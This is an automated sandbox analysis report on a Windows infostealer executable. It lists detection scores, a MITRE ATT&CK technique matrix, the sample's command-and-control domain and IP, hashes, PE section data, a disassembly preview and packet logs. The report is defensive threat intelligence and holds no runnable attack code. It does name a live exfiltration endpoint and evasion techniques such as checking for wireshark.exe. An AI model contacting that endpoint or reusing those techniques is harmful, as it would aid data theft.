Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49716 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
NWJ4JvzFcs.exe35%VirustotalBrowse
NWJ4JvzFcs.exe58%ReversingLabsWin32.Trojan.Generic
NWJ4JvzFcs.exe100%AviraTR/Crypt.TPM.Gen
NWJ4JvzFcs.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQ0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=00%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		3.218.7.103
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlNWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
            		high
            http://home.fiveth5ht.top/OyKvQNWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1433408114.000000000209A000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1440149452.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433444924.000000000209D000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433998061.00000000020A5000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433028545.0000000002095000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
              		high
              http://html4/loose.dtdNWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                		high
                http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://httpbin.org/ipbeforeNWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                  		high
                  https://curl.se/docs/http-cookies.htmlNWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSNWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                      		high
                      https://curl.se/docs/alt-svc.htmlNWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                        		high
                        http://.cssNWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                          		high
                          http://.jpgNWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpfalse
                            		high
                            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseNWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            5.101.3.217
                            		home.fiveth5ht.topRussian Federation
                            		34665PINDC-ASRUfalse
                            3.218.7.103
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1581253
                            Start date and time:2024-12-27 09:06:55 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 50s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:NWJ4JvzFcs.exe
                            renamed because original name is a hash value
                            Original Sample Name:91d22c615a675708fad7ddb68a64cf3f.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            5.101.3.217EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                            • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                            3.218.7.103EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                              PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                  qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                    Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                      DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                          lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                            w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                              E6rBvcWFWu.exeGet hashmaliciousUnknownBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                httpbin.orgEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                • 3.218.7.103
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                • 3.218.7.103
                                                3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                • 34.226.108.155
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                • 34.226.108.155
                                                home.fiveth5ht.topEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PINDC-ASRUEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                • 5.101.3.217
                                                6ufJvua5w2.exeGet hashmaliciousCryptOne, Stealc, VidarBrowse
                                                • 91.215.85.11
                                                AMAZON-AESUSEwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                • 3.218.7.103
                                                qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                • 3.218.7.103
                                                3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                • 34.226.108.155
                                                DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
                                                • 3.218.7.103
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                • 34.226.108.155
                                                xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103
                                                lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                • 3.218.7.103

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.9870103481329435
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:NWJ4JvzFcs.exe
                                                File size:4'522'496 bytes
                                                MD5:91d22c615a675708fad7ddb68a64cf3f
                                                SHA1:3f83a7beba10482293899728cd505775f250c25f
                                                SHA256:71bee394da6e85dbc2b1d660dd215346a3a957cf2aba4ab3d505a84f7fb12798
                                                SHA512:fc286048549ae455f7379eb622a3b923d0218c9393a6f12b1964e027ffa154514a626aeb67a5cb3d85bc41edca9f0e689b352bcc268e6aa6a80f375944f16656
                                                SSDEEP:98304:amOieu7Ainw0RHGRsjjE7oi/9NDm9JV/8nF8XV+TteZ:amOieIAiFmRsjjMomNDBnbhe
                                                TLSH:732633901E8E99B3C256DD7D621340A2AC898FBB1B513A84AD817F24CE17DF439F7C85
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...@....... I...@..........................p........E...@... ............................

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x1044000
                                                Entrypoint Section:.taggant
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                Authenticode Signature

                                                Signature Valid:
                                                Signature Issuer:
                                                Signature Validation Error:
                                                Error Number:
                                                Not Before, Not After
                                                  Subject Chain
                                                    Version:
                                                    Thumbprint MD5:
                                                    Thumbprint SHA-1:
                                                    Thumbprint SHA-256:
                                                    Serial:

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007F04A44F768Ah
                                                    pavgb mm0, qword ptr [eax+eax+00h]
                                                    add byte ptr [eax], al
                                                    add cl, ch
                                                    add byte ptr [eax], ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [edi], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+00h], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    pop es
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [edi], al
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add dword ptr [edx], ecx
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc42a1c0x10vsycrkux
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0xc429cc0x18vsycrkux
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x6db0000x288a00729a1eb378b34cecf7a7b2cd10b448aeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x6dc0000x1ac0x2008b188f591ece67696883250e1acbd3ecFalse0.576171875data4.547679736252066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x6de0000x3a10000x20058b368de4895dd625296705373e35eb6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    vsycrkux0xa7f0000x1c40000x1c3c00abd7b82766c3617286378adc4fe2ca6cFalse0.994511902497233data7.955164567057714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    rssptqyp0xc430000x10000x40012eda4f632be7dc25192e15b75b40458False0.7333984375data5.907051038652854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0xc440000x30000x22009ebcb01e9b1c9d4871a78ce88d21be56False0.06330422794117647DOS executable (COM)0.7531318352972309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0xc42a2c0x152ASCII text, with CRLF line terminators0.6479289940828402

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 27, 2024 09:07:51.599850893 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:51.599901915 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:51.600610018 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:51.632643938 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:51.632674932 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.434772968 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.435811043 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.435838938 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.437155962 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.437273026 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.438781023 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.438781023 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.438843012 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.489517927 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.489547968 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.536365986 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.768120050 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.768224001 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:53.768285990 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.779541969 CET49705443192.168.2.103.218.7.103
                                                    Dec 27, 2024 09:07:53.779560089 CET443497053.218.7.103192.168.2.10
                                                    Dec 27, 2024 09:07:56.425138950 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.544593096 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.544867039 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.545938015 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665481091 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665505886 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665601969 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665616989 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665627956 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665637016 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665671110 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665690899 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665704012 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665747881 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665767908 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665807009 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665812969 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665838957 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665863991 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665901899 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.665965080 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.665983915 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.666049004 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.785051107 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.785113096 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.785204887 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.785231113 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.785243988 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.785267115 CET4971680192.168.2.105.101.3.217
                                                    Dec 27, 2024 09:07:56.785320997 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.785350084 CET80497165.101.3.217192.168.2.10
                                                    Dec 27, 2024 09:07:56.785360098 CET4971680192.168.2.105.101.3.217
